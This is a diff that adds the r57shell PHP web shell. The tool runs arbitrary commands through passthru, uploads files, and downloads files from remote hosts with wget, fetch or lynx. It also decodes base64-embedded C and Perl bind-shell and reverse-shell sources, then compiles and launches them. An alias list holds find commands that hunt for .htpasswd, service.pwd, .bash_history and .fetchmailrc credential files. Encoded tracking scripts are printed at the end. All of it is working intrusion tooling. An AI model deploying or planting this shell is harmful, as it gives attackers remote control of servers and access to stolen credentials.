+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files' => 'find / -perm -2 -ls',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files in current dir' => 'find . -perm -2 -ls',
+
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
+'find all service.pwd files' => 'find / -type f -name service.pwd',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
+'find service.pwd files in current dir' => 'find . -type f -name service.pwd',
+
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
+'find all .htpasswd files' => 'find / -type f -name .htpasswd',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
+'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd',
+
+/* ïîèñê âñåõ ôàéëîâ .bash_history */
+'find all .bash_history files' => 'find / -type f -name .bash_history',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
+'find .bash_history files in current dir' => 'find . -type f -name .bash_history',
+
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
+'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
+
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
+'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
+
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
+'list file attributes on a Linux second extended file system' => 'lsattr -va',
+
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
+'show opened ports' => 'netstat -an | grep -i listen',
+
+'----------------------------------------------------------------------------------------------------' => 'ls -la'
+);
+
+/* html */
+
+$table_up1 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2 = " ::</div></b></font></td></tr><tr><td>";
+$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr></table>";
+
+/* -------------------------- Port bind source C ------------------------ */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+/* -------------------------- END Port bind source C -------------------- */
+
+/* -------------------------- Port bind perl source --------------------- */
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+/* -------------------------- END Port bind perl source ----------------- */
+
+/* -------------------------- back connect Perl source ------------------ */
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+/* -------------------------- END back connect Perl source -------------- */
+
+/* -------------------------- back connect C source --------------------- */
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+/* -------------------------- END back connect C source ----------------- */
+?>
+
+<!-- Çäðàâñòâóé  Âàñÿ -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+
+</head>
+<body bgcolor="#e4e0d8">
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc>
+<!-- logo -->
+<font face=Verdana size=2>&nbsp;&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b>
+</font>
+</td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>
+
+<?
+
+/* change dir */
+if (!empty($HTTP_POST_VARS['dir'])) { chdir($HTTP_POST_VARS['dir']); }
+$dir = getcwd();
+
+/* display information */
+echo "<font face=Verdana size=-2>";
+echo '<font color=blue><b>uname -a :&nbsp;<br>sysctl :&nbsp;<br>$OSTYPE :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>";
+$bsd1 = `/sbin/sysctl -n kern.ostype`;
+$bsd2 = `/sbin/sysctl -n kern.osrelease`;
+$lin1 = `/sbin/sysctl -n kernel.ostype`;
+$lin2 = `/sbin/sysctl -n kernel.osrelease`;
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo "&nbsp;&nbsp;&nbsp; ".$sysctl."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".exec('echo $OSTYPE')."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".$dir;
+echo "</b></font>";
+echo "</font>";
+echo $table_end1;
+
+/* port bind C */
+if (!empty($HTTP_POST_VARS['port'])&&!empty($HTTP_POST_VARS['bind_pass'])&&($HTTP_POST_VARS['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$HTTP_POST_VARS['port']." ".$HTTP_POST_VARS['bind_pass']." &";
+ $blah=exec($bind_string);
+ $HTTP_POST_VARS['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($HTTP_POST_VARS['port'])&&!empty($HTTP_POST_VARS['bind_pass'])&&($HTTP_POST_VARS['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bdpl</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bind_string);
+ $HTTP_POST_VARS['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($HTTP_POST_VARS['ip']) && !empty($HTTP_POST_VARS['port']) && ($HTTP_POST_VARS['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$HTTP_POST_VARS['ip']." ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bc_string);
+ $HTTP_POST_VARS['cmd']="echo \"Now script try connect to ".$HTTP_POST_VARS['ip']." port ".$HTTP_POST_VARS['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($HTTP_POST_VARS['ip']) && !empty($HTTP_POST_VARS['port']) && ($HTTP_POST_VARS['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$HTTP_POST_VARS['ip']." ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bc_string);
+ $HTTP_POST_VARS['cmd']="echo \"Now script try connect to ".$HTTP_POST_VARS['ip']." port ".$HTTP_POST_VARS['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* alias execute */
+if (!empty($HTTP_POST_VARS['alias']))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($HTTP_POST_VARS['alias'] == $alias_name) {$HTTP_POST_VARS['cmd']=$alias_cmd;}
+                                               }
+ }
+
+/* file upload */
+if (!empty($HTTP_POST_FILES["userfile"]))
+{
+copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $HTTP_POST_VARS['dir']."/".$HTTP_POST_FILES["userfile"][name])
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font>");
+}
+
+
+/* file upload from remote host */
+if (!empty($HTTP_POST_VARS['with']) && !empty($HTTP_POST_VARS['rem_file']) && !empty($HTTP_POST_VARS['loc_file']))
+{
+ if ($HTTP_POST_VARS['with'] == "wget") { $HTTP_POST_VARS['cmd'] = "wget ".$HTTP_POST_VARS['rem_file']." -O ".$HTTP_POST_VARS['loc_file'].""; }
+ else if ($HTTP_POST_VARS['with'] == "fetch") { $HTTP_POST_VARS['cmd']= "fetch -p ".$HTTP_POST_VARS['rem_file']." -o ".$HTTP_POST_VARS['loc_file'].""; }
+ else if ($HTTP_POST_VARS['with'] == "lynx") { $HTTP_POST_VARS['cmd']= "lynx -source ".$HTTP_POST_VARS['rem_file']." > ".$HTTP_POST_VARS['loc_file'].""; }
+}
+
+/* command execute */
+echo $table_up3;
+if ((!$HTTP_POST_VARS['cmd']) || ($HTTP_POST_VARS['cmd']=="")) { $HTTP_POST_VARS['cmd']="ls -lia"; }
+echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$HTTP_POST_VARS['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=121 rows=15>";
+echo "".passthru($HTTP_POST_VARS['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+echo $table_end1;
+
+/* command execute form */
+echo $table_up1; echo $lang[$language._text2]; echo $table_up2;
+echo "<form name=command method=post>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
+echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo "&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* aliases form */
+echo $table_up1; echo $lang[$language._text7]; echo $table_up2;
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* file upload form */
+echo $table_up1; echo $lang[$language._text5]; echo $table_up2;
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=file name=userfile size=85>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* file upload from remote host form */
+echo $table_up1; echo $lang[$language._text15]; echo $table_up2;
+echo "<form name=remote_upload method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text16]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select size=\"1\" name=\"with\">";
+echo "<option value=\"wget\">wget</option>";
+echo "<option value=\"fetch\">fetch</option>";
+echo "<option value=\"lynx\">lynx</option>";
+echo "</select>&nbsp;<br>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text17]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=rem_file value=http:// size=85>&nbsp;&nbsp;<br>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text18]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=loc_file size=85 value=".$dir.">&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* port bind form */
+echo $table_up1; echo $lang[$language._text9]; echo $table_up2;
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text20]." <font face=Wingdings color=gray>è</font>&nbsp;</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* back connect form */
+echo $table_up1; echo $lang[$language._text12]; echo $table_up2;
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text13]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text14]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text20]." <font face=Wingdings color=gray>è</font>&nbsp;</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt4]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* (c) */
+echo $table_up3;
+echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.1 ]---o</b></font></div>";
+echo $table_end1;
+
+print base64_decode("PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK0
+1hdGgucmFuZG9tKCkrIiZzPTgxNjA2JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3a
+W5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2llPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhk
+b2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2p
+zPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L3NjcmlwdD48c2NyaXB0IG
+xhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgrJ3gnK
+3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5j
+b2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGx
+vZ19qcz0iMS4zIjwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2
+pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwOi8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48a
+W1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hvdGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3Jk
+ZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSBocmVmPWh0dHA6Ly9jbGljay5
+ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hvdGxvZy
+9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2Nya
+XB0Pg==");
+
+print base64_decode("PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PC
+EtLQ0KZG9jdW1lbnQud3JpdGUoJzxhIGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3Rhcmdld
+D1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnlhZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5y
+ZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJztzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5
